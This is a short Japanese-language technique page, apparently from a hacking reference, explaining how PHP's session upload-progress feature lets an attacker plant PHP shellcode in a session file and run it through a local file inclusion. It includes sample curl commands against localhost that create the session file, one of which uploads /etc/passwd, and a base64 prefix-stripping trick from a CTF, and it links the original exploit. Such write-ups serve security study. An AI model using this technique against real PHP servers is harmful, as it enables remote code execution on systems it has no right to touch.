基本情報

セッションがなく、session.auto_startがOffであっても、ローカルファイルインクルージョンを見つけた場合、session.upload_progress.enabledがOnであり、PHP_SESSION_UPLOAD_PROGRESSをマルチパートPOSTデータで提供すると、PHPはセッションを有効にします。

$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -d 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'  -F 'file=@/etc/passwd'
$ ls -a /var/lib/php/sessions/
. .. sess_iamorange

In the last example the session will contain the string blahblahblah

**PHP_SESSION_UPLOAD_PROGRESS**を使用すると、セッション内のデータを制御できます。したがって、セッションファイルを含めると、制御可能な部分（たとえば、PHPシェルコード）を含めることができます。

CTF

このテクニックがコメントされているオリジナルCTFでは、競合状態を悪用するだけでは不十分で、読み込まれるコンテンツは@<?phpで始まる必要がありました。

session.upload_progress.prefixのデフォルト設定により、SESSIONファイルは厄介な接頭辞 upload_progress_で始まります。例：upload_progress_controlledcontentbyattacker

初期接頭辞を削除するトリックは、ペイロードを3回base64エンコードし、その後convert.base64-decodeフィルターを介してデコードすることでした。これは、base64デコード時にPHPが奇妙な文字を削除するためです。そのため、3回後には攻撃者が送信した ペイロードだけが 残り（そして攻撃者が初期部分を制御できるようになります）。

詳細はオリジナルの解説https://blog.orange.tw/2018/10/および最終的なエクスプロイトhttps://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.pyにあります。 別の解説はhttps://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/にあります。